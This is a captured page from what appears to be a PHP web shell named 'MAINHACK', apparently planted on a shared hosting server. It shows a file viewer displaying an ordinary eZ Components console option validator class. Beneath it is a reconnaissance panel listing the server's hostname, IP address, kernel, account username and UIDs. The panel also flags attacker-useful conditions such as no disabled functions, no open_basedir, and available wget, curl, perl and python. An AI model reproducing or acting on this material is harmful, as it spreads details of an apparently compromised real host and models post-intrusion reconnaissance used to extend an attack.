[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: standard.php
File is not writable. Editing disabled.
<?php /** * File containing the ezcConsoleStandardInputValidator class. * * @package ConsoleTools * @version 1.6.1 * @copyright Copyright (C) 2005-2010 eZ Systems AS. All rights reserved. * @license http://ez.no/licenses/new_bsd New BSD License * @filesource */ /** * Validates ezcConsoleOption in terms of dependencies/exclusion and more. * * @package ConsoleTools * @version 1.6.1 * * @access private */ class ezcConsoleStandardInputValidator implements ezcConsoleInputValidator { /** * Validates the given $options and $arguments. * * Validates the given $options against their registered rules. Throws an * exception, if any condition is not met. $hasArguments indicates if * arguments have been submitted in addition. * * @param array(ezcConsoleOption) $options * @param bool $hasArguments * * @throws ezcConsoleOptionDependencyViolationException * If a dependency was violated. * @throws ezcConsoleOptionExclusionViolationException * If an exclusion rule was violated. * @throws ezcConsoleOptionArgumentsViolationException * If arguments are passed although a parameter dissallowed them. * @throws ezcConsoleOptionMandatoryViolationException * If an option that was marked mandatory was not submitted. * @throws ezcConsoleOptionMissingValueException * If an option that expects a value was submitted without one. */ public function validateOptions( array $options, $hasArguments ) { foreach ( $options as $id => $option ) { if ( $option->mandatory === true && $option->value === false ) { throw new ezcConsoleOptionMandatoryViolationException( $option ); } $this->validateDependencies( $option ); $this->validateExclusions( $option ); if ( $option->arguments === false && $option->value !== false && $hasArguments ) { throw new ezcConsoleOptionArgumentsViolationException( $option ); } } } /** * Validated option dependencies. * * Validates dependencies by $option. * * @param ezcConsoleOption $option. */ private function validateDependencies( ezcConsoleOption $option ) { $optSet = ( $option->value !== false && ( !is_array( $option->value ) || $option->value !== array() ) ); foreach ( $option->getDependencies() as $dep ) { if ( $dep->ifSet === $optSet ) { $this->validateDependency( $option, $dep ); } } } /** * Validates a single dependency. * * Validates the dependency $dep, which is set in the $srcOpt. * * @param ezcConsoleOption $srcOpt * @param ezcConsoleOptionRule $dep */ private function validateDependency( ezcConsoleOption $srcOpt, ezcConsoleOptionRule $dep ) { $optValue = $dep->option->value; if ( $optValue === false || $optValue === array() ) { throw new ezcConsoleOptionDependencyViolationException( $srcOpt, $dep->option ); } if ( $dep->values !== array() ) { $optVals = ( is_array( $optValue ) ? $optValue : array( $optValue) ); $unrecognizedVals = array_diff( $optVals, $dep->values ); if ( $unrecognizedVals !== array() ) { throw new ezcConsoleOptionDependencyViolationException( $srcOpt, $dep->option, implode( ', ', $dep->values ) ); } } } /** * Validated option exclusions. * * Validates exclusions by $option. * * @param ezcConsoleOption $option. */ private function validateExclusions( ezcConsoleOption $option ) { $optSet = ( $option->value !== false && ( !is_array( $option->value ) || $option->value !== array() ) ); foreach ( $option->getExclusions() as $excl ) { if ( $excl->ifSet === $optSet ) { $this->validateExclusion( $option, $excl ); } } } /** * Validates a single exclusion. * * Validates the exclusion $excl, which is set in the $srcOpt. * * @param ezcConsoleOption $srcOpt * @param ezcConsoleOptionRule $excl */ private function validateExclusion( ezcConsoleOption $srcOpt, ezcConsoleOptionRule $excl ) { $optValue = $excl->option->value; if ( $optValue !== false && $optValue !== array() && $excl->values === array() ) { throw new ezcConsoleOptionExclusionViolationException( $srcOpt, $excl->option ); } $optVals = ( is_array( $optValue ) ? $optValue : array( $optValue ) ); $forbiddenVals = array_intersect( $optVals, $excl->values ); if ( $forbiddenVals !== array() ) { throw new ezcConsoleOptionExclusionViolationException( $srcOpt, $excl->option, implode( ', ', $excl->values ) ); } } } ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server290.web-hosting.com
Server IP: 162.0.232.250
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux server290.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
HDD Total: 93.04 GB
HDD Free: 67.69 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: afiencwd
User ID (UID): 821
Group ID (GID): 802
Script Owner UID: 821
Current Dir Owner: N/A